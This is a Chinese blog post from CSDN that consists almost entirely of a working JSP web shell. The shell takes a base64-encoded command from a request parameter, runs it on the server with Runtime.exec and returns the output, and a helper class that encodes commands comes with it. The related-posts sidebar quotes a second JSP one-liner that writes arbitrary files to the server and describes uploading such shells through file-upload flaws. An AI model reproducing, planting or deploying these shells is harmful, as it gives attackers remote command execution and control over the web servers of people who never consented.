jsp一句话

最新推荐文章于 2024-02-24 21:37:51 发布
最新推荐文章于 2024-02-24 21:37:51 发布
阅读量9.7k 收藏
点赞数
分类专栏: java
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/earbao/article/details/22078809
版权 
<%@ page language="java" import="java.util.*" pageEncoding="UTF-8"%>
<%@page import="java.io.*"%>
<%@page import="sun.misc.BASE64Decoder"%>
<%
	try {
		response.setHeader("content-type","text/html;charset=UTF-8");
		String cmd = request.getParameter("k8");
		String path = application.getRealPath(request.getRequestURI());
		String dir = new File(path).getParent();
		if (cmd.equals("Szh0ZWFt")) {
			out.print("[S]" + dir + "[E]");
		}
		byte[] binary = BASE64Decoder.class.newInstance().decodeBuffer(
				cmd);
		String k8cmd = new String(binary);
		//out.print(k8cmd);
		Process child = Runtime.getRuntime().exec(k8cmd);
		InputStream inStream = child.getInputStream();
		out.println("->||");

		ByteArrayOutputStream outSteam = new ByteArrayOutputStream();
		byte[] buffer = new byte[1024];
		int len = -1;
		while ((len = inStream.read(buffer)) != -1) {
			outSteam.write(buffer, 0, len);
		}
		String result=new String(outSteam.toByteArray(),"UTF-8");
		outSteam.close();
		inStream.close();
		result=result.replaceAll("\n","<br />");
		//System.out.print(result);
		out.println(result);	
		out.println("||<-");
		try {
			child.waitFor();
		} catch (InterruptedException e) {
			e.printStackTrace();
		}
	} catch (IOException e) {
		System.err.println(e);
	}
%>
import sun.misc.BASE64Encoder;


public class GetEncodeCMD {
	
	public static void main(String[] args) throws Exception {
		
		String bt_cmd=BASE64Encoder.class.newInstance().encode("dir d:\\".getBytes());
		System.out.println(bt_cmd);
		
	}

}


yunshouhu
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
一句话木马:JSP
09-21 8710
JSP一句话收集: <%if(request.getParameter("f")!=null)(new java.io.FileOutputStream(application.getRealPath("\\")+request.getParameter("f"))).write(request.getParameter("t").getBytes());%> ...
jsp一句话小马
weixin_42786460的博客
09-09 879
jsp一句话小马
蚁剑jsp一句话木马
jennycisp的博客
12-25 2844
密码为 passwd。
JSP一句话后门
01-08
<% if(request.getParameter(“f”)!=null)(new java.io.FileOutputStream(application.getRealPath(“\\”)+request.getParameter(“f”))).write(request.getParameter(“t”).getBytes()); %> 使用方法: 提交url! jsp?f=1.txt” target=”_blank”>http://www.whitehouse.net.cn/1.jsp?f=1.txt&t=HelloWorld 然后:http://www.whitehouse.net
Web安全-一句话木马
jennycisp的博客
12-25 2641
在很多的渗透过程中,渗透人员会上传一句话木马(简称Webshell)到目前web服务目录继而提权获取系统权限,不论asp、php、jsp、aspx都是如此,那么一句话木马到底是什么呢?【点击免费领取】CSDN大礼包:《黑客&网络安全入门&进阶学习资源包》?基本原理】利用文件上传漏洞,往目标网站中上传一句话木马,然后你就可以在本地通过中国菜刀即可获取和控制整个网站目录。@表示后面即使执行错误,也不报错。eval()函数表示括号内的语句字符串什么的全都当做代码执行。表示从页面中获得attack这个参数值。
JSP一句话代码
05-15
JSP一句话代码
JSP一句话下载代码
12-30
JSP一句话下载代码
一句话木马要点和防范注意事项
最新发布
05-24
一句话木马通常是基于PHP、ASP、JSP等服务器端脚本语言编写的,它们利用了这些语言的特性,如命令执行、文件包含、变量注入等漏洞,使得攻击者可以在服务器上执行任意命令。例如,一个简单的PHP一句话木马可能如下所...
jspshell 一句话
07-24
jsp shell
webshell -真实可用的jsp
03-30
网上很多一句话、webshell 各种原因导致不能用,亲测可用的大马,忍痛割爱与大家分享
xise菜刀无后门,支持任意方式链接
04-22
xise修改版,支持任意一句话链接,目录查看等,jspx也可以查看
Aspx一句话网马Webshell.rar
01-07
Aspx一句话网马Webshell.rar
jsp利用base64解码上传二进制文件
weixin_33829657的博客
05-19 800
当我们在有新建文本文件权限,但被限制上传、不能远程下载文件时,可以试试此方式shell:<%@ page import="java.util.*,java.io.*" pageEncoding="UTF-8" contentType="text/html; charset=utf-8"%> <% request.setCharacterE...
java安全——jsp一句话木马
Innocence_0的博客
02-24 1309
从时代发展的角度看,网络安全的知识是学不完的,而且以后要学的会更多,同学们要摆正心态,既然选择入门网络安全,就不能仅仅只是入门程度而已,能力越强机会才越多。因为入门学习阶段知识点比较杂,所以我讲得比较笼统,大家如果有不懂的地方可以找我咨询,我保证知无不言言无不尽,需要相关资料也可以找我要,我的网盘里一大堆资料都在吃灰呢。干货主要有:①1000+CTF历届题库(主流和经典的应该都有了)②CTF技术文档(最全中文版)③项目源码(四五十个有趣且经典的练手项目及源码)
一句话经典」JavaWeb中的JSP
z00238082的博客
01-24 1879
JSP内置对象及其作用: request:用户端请求,此请求会包含来自GET/POST请求的参数; response:网页传回用户端的回应; pageContext:网页的属性是在这里管理的; Session:与请求有关的会话周期; application:Servlet正在执行的内容; Out:用来传送回应的输出; Config:Servlet的架构部件; Page:JSP网页本
JSP&EL表达式&MVC&三层结构综合案例
qq_46002941的博客
02-17 1508
文章目录JSP1,JSP 概述2,JSP 快速入门2.1 搭建环境2.2 导入 JSP 依赖2.3 创建 jsp 页面2.4 编写代码2.5 测试3,JSP 原理4,JSP 脚本4.1 JSP 脚本分类4.2 案例4.2.1 需求4.2.2 实现4.2.3 成品代码4.2.4 测试4.3 JSP 缺点5,EL 表达式5.1 概述5.2 代码演示5.3 域对象6,JSTL标签6.1 概述6.2 if 标签6.3 forEach 标签6.3.1 用法一6.3.2 用法二7
使用python连接JSP一句话木马
分享与记录
08-24 3551
首先需要安装tomcat。 去官网 http://tomcat.apache.org/ 下载对应的 Linux 版本。 这里,我下载的是 apache-tomcat-8.5.70.tar.gz 最好提前安装好 JDK1.8 ,因为 kali 自带的那个可能会出现一点问题。 这是我遇到的问题,随手记录了一下。 https://blog.csdn.net/weixin_45254208/article/details/119897865 不过你也可以不重装,等出了问题再重装,万一你的电脑就没有我这种情况

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值